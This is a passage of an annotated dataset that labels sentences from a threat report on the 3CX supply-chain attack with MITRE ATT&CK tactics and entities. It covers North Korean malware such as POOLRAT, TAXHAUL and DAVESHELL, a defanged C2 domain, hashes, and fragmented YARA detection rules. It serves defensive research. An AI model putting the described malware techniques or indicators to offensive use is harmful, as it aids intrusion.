"75_mitre_report", "page_number": 1, "sentence_id": 32, "context_before": "Threat Actor Spotlight: UNC4736 UNC4736 demonstrates varying degrees of overlap with multiple North Korean operators tracked by Mandiant Intelligence, especially with those involved in financially-motivated cybercrime operations.", "sentence_text": "These clusters have demonstrated a sustained focus on cryptocurrency and fintech-related services over time.\nin February 2022, preceding the distribution of compromised X_TRADER updates from the site.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-75_mitre_report-p1-s33-c904a9", "source": "mitre", "doc_id": "75_mitre_report", "page_number": 1, "sentence_id": 33, "context_before": "These clusters have demonstrated a sustained focus on cryptocurrency and fintech-related services over time.\nin February 2022, preceding the distribution of compromised X_TRADER updates from the site.", "sentence_text": "TAG\nreported\non a cluster of North Korean activity exploiting a remote code execution vulnerability in Chrome, CVE-2022-0609 , and identified it as overlapping with “AppleJeus” targeting cryptocurrency services.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1203", "name": "Exploitation for Client Execution" } ], "procedure": "Exploited Chrome RCE vulnerability (CVE-2022-0609)", "entities": [ { "text": "North Korean", "start": 29, "end": 41, "label": "ThreatActor" }, { "text": "AppleJeus", "start": 166, "end": 175, "label": "ThreatActor" }, { "text": " CVE-2022-0609", "start": 110, "end": 124, "label": "Infrastructure_Indicator" }, { "text": "exploiting ", "start": 51, "end": 62, "label": "Action" } ] }, { "uid": "mitre-75_mitre_report-p1-s34-d1a9e0", "source": "mitre", "doc_id": "75_mitre_report", "page_number": 1, "sentence_id": 34, "context_before": "TAG reported on a cluster of North Korean activity exploiting a remote code execution vulnerability in Chrome, CVE-2022-0609, and identified it as overlapping with “AppleJeus” targeting cryptocurrency services.", "sentence_text": "The site was compromised and hosting a hidden IFRAME to exploit visitors, just two months before the site was known to deliver a trojanized X_TRADER software package.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": null, "procedure": "Attackers compromised a website and hosted a hidden IFRAME to exploit visitors and later delivered a trojanized X_TRADER software package.", "entities": [ { "text": "site was compromised", "start": 4, "end": 24, "label": "Action" }, { "text": "hosting a hidden IFRAME to exploit visitors", "start": 29, "end": 72, "label": "Action" }, { "text": "trojanized X_TRADER software package", "start": 129, "end": 165, "label": "MalwareTool" } ] }, { "uid": "mitre-75_mitre_report-p1-s35-6ad1d0", "source": "mitre", "doc_id": "75_mitre_report", "page_number": 1, "sentence_id": 35, "context_before": "The site was compromised and hosting a hidden IFRAME to exploit visitors, just two months before the site was known to deliver a trojanized X_TRADER software package.", "sentence_text": "Within the 3CX environment, Mandiant identified the POOLRAT backdoor using journalide[.]org as its configured C2 server.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": null, "procedure": "POOLRAT backdoor communicates with its configured C2 server journalide[.]org within the 3CX environment.", "entities": [ { "text": "POOLRAT backdoor", "start": 52, "end": 68, "label": "MalwareTool" }, { "text": "using journalide[.]org as its configured C2 server", "start": 69, "end": 119, "label": "Action" }, { "text": "journalide[.]org", "start": 75, "end": 91, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-75_mitre_report-p1-s36-6f56fd", "source": "mitre", "doc_id": "75_mitre_report", "page_number": 1, "sentence_id": 36, "context_before": "Within the 3CX environment, Mandiant identified the POOLRAT backdoor using journalide[.]org as its configured C2 server.", "sentence_text": "An older sample of POOLRAT (MD5: 451c23709ecd5a8461ad060f6346930c) was previously reported by CISA as part of the trojanized CoinGoTrade application used in the AppleJeus operation (Figure 2).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-75_mitre_report-p1-s37-943aec", "source": "mitre", "doc_id": "75_mitre_report", "page_number": 1, "sentence_id": 37, "context_before": "An older sample of POOLRAT (MD5: 451c23709ecd5a8461ad060f6346930c) was previously reported by CISA as part of the trojanized CoinGoTrade application used in the AppleJeus operation (Figure 2).", "sentence_text": "Weak infrastructure overlap was also identified between UNC4736 and two clusters of suspected APT43 activity, UNC3782 and UNC4469.\nDNS resolutions reveal infrastructure overlap between UNC4736 and activity linked to APT43 with moderate confidence (Tables 1 – 3)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-75_mitre_report-p1-s38-9db5dd", "source": "mitre", "doc_id": "75_mitre_report", "page_number": 1, "sentence_id": 38, "context_before": "Weak infrastructure overlap was also identified between UNC4736 and two clusters of suspected APT43 activity, UNC3782 and UNC4469.\nDNS resolutions reveal infrastructure overlap between UNC4736 and activity linked to APT43 with moderate confidence (Tables 1 – 3)", "sentence_text": "APT43 frequently targets cryptocurrency users and related services, highlighting such campaigns are widespread across North Korea-nexus cyber operators.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-75_mitre_report-p1-s39-af012d", "source": "mitre", "doc_id": "75_mitre_report", "page_number": 1, "sentence_id": 39, "context_before": "APT43 frequently targets cryptocurrency users and related services, highlighting such campaigns are widespread across North Korea-nexus cyber operators.", "sentence_text": "Outlook and Implications The identified software supply chain compromise is the first we are aware of which has led to a cascading software supply chain compromise.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-75_mitre_report-p1-s40-72b8b6", "source": "mitre", "doc_id": "75_mitre_report", "page_number": 1, "sentence_id": 40, "context_before": "Outlook and Implications The identified software supply chain compromise is the first we are aware of which has led to a cascading software supply chain compromise.", "sentence_text": "It shows the potential reach of this type of compromise, particularly when a threat actor can chain intrusions as demonstrated in this investigation.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-75_mitre_report-p1-s41-183137", "source": "mitre", "doc_id": "75_mitre_report", "page_number": 1, "sentence_id": 41, "context_before": "It shows the potential reach of this type of compromise, particularly when a threat actor can chain intrusions as demonstrated in this investigation.", "sentence_text": "Research on UNC4736 activity suggests that it is most likely linked to financially motivated North Korean threat actors.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-75_mitre_report-p1-s42-2985c0", "source": "mitre", "doc_id": "75_mitre_report", "page_number": 1, "sentence_id": 42, "context_before": "Research on UNC4736 activity suggests that it is most likely linked to financially motivated North Korean threat actors.", "sentence_text": "Cascading software supply chain compromises demonstrate that North Korean operators can exploit network access in creative ways to develop and distribute malware, and move between target networks while conducting operations aligned with North Korea’s interests Malware Definitions ICONICSTEALER ICONICSTEALER is a C/C++ data miner that collects application configuration data as well as browser history.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-75_mitre_report-p1-s43-8b1859", "source": "mitre", "doc_id": "75_mitre_report", "page_number": 1, "sentence_id": 43, "context_before": "Cascading software supply chain compromises demonstrate that North Korean operators can exploit network access in creative ways to develop and distribute malware, and move between target networks while conducting operations aligned with North Korea’s interests Malware Definitions ICONICSTEALER ICONICSTEALER is a C/C++ data miner that collects application configuration data as well as browser history.", "sentence_text": "DAVESHELL\nDAVESHELL is shellcode that functions as an in-memory dropper.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-75_mitre_report-p1-s44-10903f", "source": "mitre", "doc_id": "75_mitre_report", "page_number": 1, "sentence_id": 44, "context_before": "DAVESHELL\nDAVESHELL is shellcode that functions as an in-memory dropper.", "sentence_text": "Its embedded payload is mapped into memory and executed.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-75_mitre_report-p1-s46-cc44b2", "source": "mitre", "doc_id": "75_mitre_report", "page_number": 1, "sentence_id": 46, "context_before": "SIGFLIP", "sentence_text": "SigFlip is a tool for patching authenticode signed PE-COFF files to inject arbitrary code without affecting or breaking the file's signature.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-75_mitre_report-p1-s47-2cd7fe", "source": "mitre", "doc_id": "75_mitre_report", "page_number": 1, "sentence_id": 47, "context_before": "SigFlip is a tool for patching authenticode signed PE-COFF files to inject arbitrary code without affecting or breaking the file's signature.", "sentence_text": "POOLRAT\nPOOLRAT is a C/C++ macOS backdoor capable of collecting basic system information and executing commands.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-75_mitre_report-p1-s48-3f133b", "source": "mitre", "doc_id": "75_mitre_report", "page_number": 1, "sentence_id": 48, "context_before": "POOLRAT\nPOOLRAT is a C/C++ macOS backdoor capable of collecting basic system information and executing commands.", "sentence_text": "TAXHAUL\nTAXHAUL is a DLL that, when executed, decrypts a shellcode payload expected at C:\\Windows\\System32\\config\\TxR\\.TxR.0.regtrans-ms .", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-75_mitre_report-p1-s49-4d3cc4", "source": "mitre", "doc_id": "75_mitre_report", "page_number": 1, "sentence_id": 49, "context_before": "TAXHAUL\nTAXHAUL is a DLL that, when executed, decrypts a shellcode payload expected at C:\\Windows\\System32\\config\\TxR\\.TxR.0.regtrans-ms .", "sentence_text": "COLDCAT generates unique host identifier information, and beacons it to a C2 that is specified in a separate file via POST request with the data in the cookie header.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-75_mitre_report-p1-s50-27e1c2", "source": "mitre", "doc_id": "75_mitre_report", "page_number": 1, "sentence_id": 50, "context_before": "COLDCAT generates unique host identifier information, and beacons it to a C2 that is specified in a separate file via POST request with the data in the cookie header.", "sentence_text": "After a brief handshake, the malware expects base64 encoded shellcode to execute in response.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-75_mitre_report-p1-s51-a71240", "source": "mitre", "doc_id": "75_mitre_report", "page_number": 1, "sentence_id": 51, "context_before": "After a brief handshake, the malware expects base64 encoded shellcode to execute in response.", "sentence_text": "VEILEDSIGNAL\nVEILEDSIGNAL is a backdoor written in C that is able to execute shellcode and terminate itself.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-75_mitre_report-p1-s52-b55087", "source": "mitre", "doc_id": "75_mitre_report", "page_number": 1, "sentence_id": 52, "context_before": "VEILEDSIGNAL\nVEILEDSIGNAL is a backdoor written in C that is able to execute shellcode and terminate itself.", "sentence_text": "Additionally, VEILEDSIGNAL relies on additional modules that connect via Windows named pipes to interact with the C2 infrastructure.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-75_mitre_report-p1-s53-c6cf96", "source": "mitre", "doc_id": "75_mitre_report", "page_number": 1, "sentence_id": 53, "context_before": "Additionally, VEILEDSIGNAL relies on additional modules that connect via Windows named pipes to interact with the C2 infrastructure.", "sentence_text": "Technical Annex: MITRE ATT&CK Resource Development T1588 Obtain Capabilities T1588.004 Digital Certificates T1608 Stage Capabilities T1608.003 Install Digital Certificate Initial Access T1190 Exploit Public-Facing Application T1195 Supply Chain Compromise T1195.002", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-75_mitre_report-p1-s54-a24186", "source": "mitre", "doc_id": "75_mitre_report", "page_number": 1, "sentence_id": 54, "context_before": "Technical Annex: MITRE ATT&CK Resource Development T1588 Obtain Capabilities T1588.004 Digital Certificates T1608 Stage Capabilities T1608.003 Install Digital Certificate Initial Access T1190 Exploit Public-Facing Application T1195 Supply Chain Compromise T1195.002", "sentence_text": "Compromise Software Supply Chain Persistence T1574 Hijack Execution Flow T1574.002 DLL Side-Loading Privilege Escalation T1055 Process Injection T1574 Hijack Execution Flow T1574.002 DLL Side-Loading Defense Evasion T1027 Obfuscated Files or Information T1036", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-75_mitre_report-p1-s55-304e75", "source": "mitre", "doc_id": "75_mitre_report", "page_number": 1, "sentence_id": 55, "context_before": "Compromise Software Supply Chain Persistence T1574 Hijack Execution Flow T1574.002 DLL Side-Loading Privilege Escalation T1055 Process Injection T1574 Hijack Execution Flow T1574.002 DLL Side-Loading Defense Evasion T1027 Obfuscated Files or Information T1036", "sentence_text": "Masquerading T1036.001 Invalid Code Signature T1055 Process Injection T1070", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-75_mitre_report-p1-s56-386f90", "source": "mitre", "doc_id": "75_mitre_report", "page_number": 1, "sentence_id": 56, "context_before": "Masquerading T1036.001 Invalid Code Signature T1055 Process Injection T1070", "sentence_text": "Indicator Removal T1070.001 Clear Windows Event Logs T1070.004 File Deletion T1112 Modify Registry T1140 Deobfuscate/Decode Files or Information T1497 Virtualization/Sandbox Evasion T1497.001 System Checks T1574 Hijack Execution Flow T1574.002 DLL Side-Loading T1620 Reflective Code Loading T1622 Debugger Evasion Discovery T1012 Query Registry T1082 System Information Discovery T1083 File and Directory Discovery T1497 Virtualization/Sandbox Evasion T1497.001 System Checks T1614 System Location Discovery T1614.001 System Language Discovery T1622", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-75_mitre_report-p1-s57-ec6eeb", "source": "mitre", "doc_id": "75_mitre_report", "page_number": 1, "sentence_id": 57, "context_before": "Indicator Removal T1070.001 Clear Windows Event Logs T1070.004 File Deletion T1112 Modify Registry T1140 Deobfuscate/Decode Files or Information T1497 Virtualization/Sandbox Evasion T1497.001 System Checks T1574 Hijack Execution Flow T1574.002 DLL Side-Loading T1620 Reflective Code Loading T1622 Debugger Evasion Discovery T1012 Query Registry T1082 System Information Discovery T1083 File and Directory Discovery T1497 Virtualization/Sandbox Evasion T1497.001 System Checks T1614 System Location Discovery T1614.001 System Language Discovery T1622", "sentence_text": "Debugger Evasion Command and Control T1071 Application Layer Protocol T1071.001 Web Protocols T1071.004 DNS T1105 Ingress Tool Transfer T1573 Encrypted Channel T1573.002 Asymmetric Cryptography Impact", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-75_mitre_report-p1-s58-047db2", "source": "mitre", "doc_id": "75_mitre_report", "page_number": 1, "sentence_id": 58, "context_before": "Debugger Evasion Command and Control T1071 Application Layer Protocol T1071.001 Web Protocols T1071.004 DNS T1105 Ingress Tool Transfer T1573 Encrypted Channel T1573.002 Asymmetric Cryptography Impact", "sentence_text": "T1565 Data Manipulation T1565.001 Stored Data Manipulation Technical Annex: Detection Rules YARA Rules rule M_Hunting_3CXDesktopApp_Key { meta:\ndisclaimer = \"This rule is meant for hunting and is not tested to run in a production environment\" description = \"Detects a key found in a malicious 3CXDesktopApp file\" md5 = \"74bc2d0b6680faa1a5a76b27e5479cbc\" date = \"2023/03/29\" version = \"1\" strings:\n$key = \"3jB(2bsG#@c7\" wide ascii condition:\n$key\n}\nrule M_Hunting_3CXDesktopApp_Export { meta:\ndisclaimer = \"This rule is meant for hunting and is not tested to run in a production environment\" description = \"Detects an export used in 3CXDesktopApp malware\" md5 = \"7faea2b01796b80d180399040bb69835\" date = \"2023/03/31\" version = \"1\" strings:\n$str1 = \"DllGetClassObject\" wide ascii $str2 = \"3CXDesktopApp\" wide ascii condition:\nall of ($str*)\n}\nrule TAXHAUL\n{\nmeta:\nauthor = \"Mandiant\" created = \"04/03/2023\" modified = \"04/03/2023\" version = \"1.0\" strings:\n$p00_0 = {410f45fe4c8d3d[4]eb??4533f64c8d3d[4]eb??4533f64c8d3d[4]eb} $p00_1 = {4d3926488b01400f94c6ff90[4]41b9[4]eb??8bde4885c074} condition:\nuint16(0) == 0x5A4D and any of them } rule M_Hunting_MSI_Installer_3CX_1 { meta:\nauthor = \"Mandiant\" md5 = \"0eeb1c0133eb4d571178b2d9d14ce3e9, f3d4144860ca10ba60f7ef4d176cc736\" strings:\n$ss1 = { 20 00 5F 64 33 64 63 6F 6D 70 69 6C 65 72 5F 34 37 2E 64 6C 6C 5F } $ss2 = { 20 00 5F 33 43 58 44 65 73 6B 74 6F 70 41 70 70 2E } $ss3 = { 20 00 5F 66 66 6D 70 65 67 2E 64 6C 6C 5F } $ss4 = \"3CX Ltd1\" ascii $sc1 = { 1B 66 11 DF 9C 9A 4D 6E CC 8E D5 0C 9B 91 78 73 } $sc2 = \"202303\" ascii condition:\n(uint32(0) == 0xE011CFD0) and filesize > 90MB and filesize < 105MB and all of them } rule M_Hunting_TAXHAUL_Hash_1 { meta:\nauthor = \"Mandiant\" disclaimer = \"This rule is meant for hunting and is not tested to run in a production environment\" description = \"Rule looks for hardcoded value used in string hashing algorithm observed in instances of TAXHAUL.\"", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-75_mitre_report-p1-s59-f8c635", "source": "mitre", "doc_id": "75_mitre_report", "page_number": 1, "sentence_id": 59, "context_before": "T1565 Data Manipulation T1565.001 Stored Data Manipulation Technical Annex: Detection Rules YARA Rules rule M_Hunting_3CXDesktopApp_Key { meta:\ndisclaimer = \"This rule is meant for hunting and is not tested to run in a production environment\" description = \"Detects a key found in a malicious 3CXDesktopApp file\" md5 = \"74bc2d0b6680faa1a5a76b27e5479cbc\" date = \"2023/03/29\" version = \"1\" strings:\n$key = \"3jB(2bsG#@c7\" wide ascii condition:\n$key\n}\nrule M_Hunting_3CXDesktopApp_Export { meta:\ndisclaimer = \"This rule is meant for hunting and is not tested to run in a production environment\" description = \"Detects an export used in 3CXDesktopApp malware\" md5 = \"7faea2b01796b80d180399040bb69835\" date = \"2023/03/31\" version = \"1\" strings:\n$str1 = \"DllGetClassObject\" wide ascii $str2 = \"3CXDesktopApp\" wide ascii condition:\nall of ($str*)\n}\nrule TAXHAUL\n{\nmeta:\nauthor = \"Mandiant\" created = \"04/03/2023\" modified = \"04/03/2023\" version = \"1.0\" strings:\n$p00_0 = {410f45fe4c8d3d[4]eb??4533f64c8d3d[4]eb??4533f64c8d3d[4]eb} $p00_1 = {4d3926488b01400f94c6ff90[4]41b9[4]eb??8bde4885c074} condition:\nuint16(0) == 0x5A4D and any of them } rule M_Hunting_MSI_Installer_3CX_1 { meta:\nauthor = \"Mandiant\" md5 = \"0eeb1c0133eb4d571178b2d9d14ce3e9, f3d4144860ca10ba60f7ef4d176cc736\" strings:\n$ss1 = { 20 00 5F 64 33 64 63 6F 6D 70 69 6C 65 72 5F 34 37 2E 64 6C 6C 5F } $ss2 = { 20 00 5F 33 43 58 44 65 73 6B 74 6F 70 41 70 70 2E } $ss3 = { 20 00 5F 66 66 6D 70 65 67 2E 64 6C 6C 5F } $ss4 = \"3CX Ltd1\" ascii $sc1 = { 1B 66 11 DF 9C 9A 4D 6E CC 8E D5 0C 9B 91 78 73 } $sc2 = \"202303\" ascii condition:\n(uint32(0) == 0xE011CFD0) and filesize > 90MB and filesize < 105MB and all of them } rule M_Hunting_TAXHAUL_Hash_1 { meta:\nauthor = \"Mandiant\" disclaimer = \"This rule is meant for hunting and is not tested to run in a production environment\" description = \"Rule looks for hardcoded value used in string hashing algorithm observed in instances of TAXHAUL.\"", "sentence_text": "md5 = \"e424f4e52d21c3da1b08394b42bc0829\" strings:\n$c_x64 = { 25 A3 87 DE", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-75_mitre_report-p1-s60-3d7622", "source": "mitre", "doc_id": "75_mitre_report", "page_number": 1, "sentence_id": 60, "context_before": "md5 = \"e424f4e52d21c3da1b08394b42bc0829\" strings:\n$c_x64 = { 25 A3 87 DE", "sentence_text": "filesize < 15MB and uint16(0)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-75_mitre_report-p1-s61-f70172", "source": "mitre", "doc_id": "75_mitre_report", "page_number": 1, "sentence_id": 61, "context_before": "filesize < 15MB and uint16(0)", "sentence_text": "== 0x5a4d and uint32(uint32(0x3C))", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-75_mitre_report-p1-s62-57889b", "source": "mitre", "doc_id": "75_mitre_report", "page_number": 1, "sentence_id": 62, "context_before": "== 0x5a4d and uint32(uint32(0x3C))", "sentence_text": "== 0x00004550 and any of them } rule M_Hunting_SigFlip_SigLoader_Native { meta:\nauthor = \"Mandiant\" disclaimer = \"This rule is meant for hunting and is not tested to run in a production environment\" description = \"Rule looks for strings present in SigLoader (Native)\" md5 = \"a3ccc48db9eabfed7245ad6e3a5b203f\" strings:\n$s1 = \"[*]: Basic Loader...\"", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-75_mitre_report-p1-s63-80c724", "source": "mitre", "doc_id": "75_mitre_report", "page_number": 1, "sentence_id": 63, "context_before": "== 0x00004550 and any of them } rule M_Hunting_SigFlip_SigLoader_Native { meta:\nauthor = \"Mandiant\" disclaimer = \"This rule is meant for hunting and is not tested to run in a production environment\" description = \"Rule looks for strings present in SigLoader (Native)\" md5 = \"a3ccc48db9eabfed7245ad6e3a5b203f\" strings:\n$s1 = \"[*]: Basic Loader...\"", "sentence_text": "ascii wide $s2 = \"[!]: Missing PE path or Encryption Key...\" ascii wide $s3 = \"[!]:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-75_mitre_report-p1-s64-3c90af", "source": "mitre", "doc_id": "75_mitre_report", "page_number": 1, "sentence_id": 64, "context_before": "ascii wide $s2 = \"[!]: Missing PE path or Encryption Key...\" ascii wide $s3 = \"[!]:", "sentence_text": "Usage: %s \" ascii wide $s4 = \"[*]: Loading/Parsing PE File '%s'\" ascii wide $s5 = \"[!]: Could not read file %s\" ascii wide $s6 = \"[!]: '%s' is not a valid PE file\" ascii wide $s7 = \"[+]: Certificate Table RVA %x\" ascii wide $s8 = \"[+]: Certificate Table Size %d\" ascii wide $s9 = \"[*]: Tag Found 0x%x%x%x%x\" ascii wide $s10 = \"[!]: Could not locate data/shellcode\" ascii wide $s11 = \"[+]: Encrypted/Decrypted Data Size %d\" ascii wide condition:\nfilesize < 15MB and uint16(0) == 0x5a4d and uint32(uint32(0x3C))", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-75_mitre_report-p1-s65-a6e943", "source": "mitre", "doc_id": "75_mitre_report", "page_number": 1, "sentence_id": 65, "context_before": "Usage: %s \" ascii wide $s4 = \"[*]: Loading/Parsing PE File '%s'\" ascii wide $s5 = \"[!]: Could not read file %s\" ascii wide $s6 = \"[!]: '%s' is not a valid PE file\" ascii wide $s7 = \"[+]: Certificate Table RVA %x\" ascii wide $s8 = \"[+]: Certificate Table Size %d\" ascii wide $s9 = \"[*]: Tag Found 0x%x%x%x%x\" ascii wide $s10 = \"[!]: Could not locate data/shellcode\" ascii wide $s11 = \"[+]: Encrypted/Decrypted Data Size %d\" ascii wide condition:\nfilesize < 15MB and uint16(0) == 0x5a4d and uint32(uint32(0x3C))", "sentence_text": "== 0x00004550 and 4 of ($s*)\n}\nrule M_Hunting_Raw64_DAVESHELL_Bootstrap\n{\nmeta:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-75_mitre_report-p1-s66-09b87f", "source": "mitre", "doc_id": "75_mitre_report", "page_number": 1, "sentence_id": 66, "context_before": "== 0x00004550 and 4 of ($s*)\n}\nrule M_Hunting_Raw64_DAVESHELL_Bootstrap\n{\nmeta:", "sentence_text": "author = \"Mandiant\" disclaimer = \"This rule is meant for hunting and is not tested to run in a production environment\" description = \"Rule looks for bootstrap shellcode (64 bit) present in DAVESHELL\" md5 = \"8a34adda5b981498234be921f86dfb27\" strings:\n$b6ba50888f08e4f39b43ef67da27521dcfc61f1e = { E8 00 00 00 00 59 49 89 C8 48 81 C1 ?? ?? ?? ??", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-75_mitre_report-p1-s77-4899e9", "source": "mitre", "doc_id": "75_mitre_report", "page_number": 1, "sentence_id": 77, "context_before": "E8 ??", "sentence_text": "48 89 F4 5E C3 } condition:\nfilesize < 15MB and any of them } rule M_Hunting_MSI_Installer_3CX_1 { meta:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-75_mitre_report-p1-s78-baf97b", "source": "mitre", "doc_id": "75_mitre_report", "page_number": 1, "sentence_id": 78, "context_before": "48 89 F4 5E C3 } condition:\nfilesize < 15MB and any of them } rule M_Hunting_MSI_Installer_3CX_1 { meta:", "sentence_text": "author = \"Mandiant\" disclaimer = \"This rule is meant for hunting and is not tested to run in a production environment\" description = \"This rule looks for hardcoded values within the MSI installer observed in strings and signing certificate\" md5 = \"0eeb1c0133eb4d571178b2d9d14ce3e9\" strings:\n$ss1 = { 20 00 5F 64 33 64 63 6F 6D 70 69 6C 65 72 5F 34 37 2E 64 6C 6C 5F } $ss2 = { 20 00 5F 33 43 58 44 65 73 6B 74 6F 70 41 70 70 2E } $ss3 = { 20 00", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-75_mitre_report-p1-s79-9d1f50", "source": "mitre", "doc_id": "75_mitre_report", "page_number": 1, "sentence_id": 79, "context_before": "author = \"Mandiant\" disclaimer = \"This rule is meant for hunting and is not tested to run in a production environment\" description = \"This rule looks for hardcoded values within the MSI installer observed in strings and signing certificate\" md5 = \"0eeb1c0133eb4d571178b2d9d14ce3e9\" strings:\n$ss1 = { 20 00 5F 64 33 64 63 6F 6D 70 69 6C 65 72 5F 34 37 2E 64 6C 6C 5F } $ss2 = { 20 00 5F 33 43 58 44 65 73 6B 74 6F 70 41 70 70 2E } $ss3 = { 20 00", "sentence_text": "5F 66 66 6D 70 65 67 2E 64 6C 6C 5F } $ss4 = \"3CX Ltd1\" ascii $sc1 = { 1B 66 11 DF 9C 9A 4D 6E CC 8E D5 0C 9B 91 78 73 } $sc2 = \"202303\" ascii condition:\n(uint32(0) == 0xE011CFD0) and filesize > 90MB and filesize < 100MB and all of them } rule M_Hunting_VEILEDSIGNAL_1 { meta:\nauthor = \"Mandiant\" disclaimer = \"This rule is meant for hunting and is not tested to run in a production environment\" md5 = \"404b09def6054a281b41d309d809a428, c6441c961dcad0fe127514a918eaabd4\" strings:\n$rh1 = { 68 5D 7A D2 2C 3C 14 81 2C 3C 14 81 2C 3C 14 81 77 54 10 80 26 3C 14 81 77 54 17 80 29 3C 14 81 77 54 11 80 AB 3C 14 81 D4 4C 11 80 33 3C 14 81 D4 4C 10 80 22 3C 14 81 D4 4C 17 80 25 3C 14 81 77 54 15 80 27 3C 14 81 2C 3C 15 81 4B 3C 14 81 94 4D 1D 80 28 3C 14 81 94 4D 14 80 2D 3C 14 81 94 4D 16 80 2D 3C 14 81 } $rh2 = { 00 E5 A0 2B 44 84 CE 78 44 84 CE 78 44 84 CE 78 1F EC CA 79 49 84 CE 78 1F EC CD 79 41 84 CE 78 1F EC CB 79", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-75_mitre_report-p1-s80-796753", "source": "mitre", "doc_id": "75_mitre_report", "page_number": 1, "sentence_id": 80, "context_before": "5F 66 66 6D 70 65 67 2E 64 6C 6C 5F } $ss4 = \"3CX Ltd1\" ascii $sc1 = { 1B 66 11 DF 9C 9A 4D 6E CC 8E D5 0C 9B 91 78 73 } $sc2 = \"202303\" ascii condition:\n(uint32(0) == 0xE011CFD0) and filesize > 90MB and filesize < 100MB and all of them } rule M_Hunting_VEILEDSIGNAL_1 { meta:\nauthor = \"Mandiant\" disclaimer = \"This rule is meant for hunting and is not tested to run in a production environment\" md5 = \"404b09def6054a281b41d309d809a428, c6441c961dcad0fe127514a918eaabd4\" strings:\n$rh1 = { 68 5D 7A D2 2C 3C 14 81 2C 3C 14 81 2C 3C 14 81 77 54 10 80 26 3C 14 81 77 54 17 80 29 3C 14 81 77 54 11 80 AB 3C 14 81 D4 4C 11 80 33 3C 14 81 D4 4C 10 80 22 3C 14 81 D4 4C 17 80 25 3C 14 81 77 54 15 80 27 3C 14 81 2C 3C 15 81 4B 3C 14 81 94 4D 1D 80 28 3C 14 81 94 4D 14 80 2D 3C 14 81 94 4D 16 80 2D 3C 14 81 } $rh2 = { 00 E5 A0 2B 44 84 CE 78 44 84 CE 78 44 84 CE 78 1F EC CA 79 49 84 CE 78 1F EC CD 79 41 84 CE 78 1F EC CB 79", "sentence_text": "C8 84 CE 78 BC F4 CA 79 4A 84 CE 78 BC F4 CD 79 4D 84 CE 78 BC F4 CB 79 65 84 CE 78 1F EC CF 79 43 84 CE 78 44 84 CF 78 22 84 CE 78 FC F5 C7 79 42 84 CE 78 FC F5 CE 79 45 84 CE 78 FC F5 CC 79 45 84 CE 78} $rh3 = { DA D2 21 22 9E B3 4F 71 9E B3 4F 71 9E B3 4F 71 C5 DB 4C 70 94 B3 4F 71 C5 DB 4A 70 15 B3 4F 71 C5 DB 4B 70 8C B3 4F 71 66 C3 4B 70 8C B3 4F 71 66 C3 4C 70 8F B3 4F 71 C5 DB 49 70 9F B3 4F 71 66 C3 4A 70 B0 B3 4F 71 C5 DB 4E 70 97 B3 4F 71 9E B3 4E 71 F9 B3 4F 71 26 C2 46 70 9F B3 4F 71 26 C2 B0 71 9F B3 4F 71 9E B3 D8 71 9F B3 4F 71 26 C2 4D 70 9F B3 4F 71 } $rh4 = { CB 8A 35 66 8F EB 5B 35 8F EB 5B 35 8F EB 5B 35 D4 83 5F 34 85 EB 5B 35 D4 83 58 34 8A EB 5B 35 D4 83 5E 34 09 EB 5B 35 77 9B 5E 34 92 EB 5B 35 77 9B 5F 34 81 EB 5B 35 77 9B 58 34 86 EB 5B 35 D4 83 5A 34 8C EB 5B 35 8F EB 5A 35 D3 EB 5B 35 37 9A 52 34 8C EB 5B 35 37 9A 58 34 8E EB 5B 35 37 9A 5B 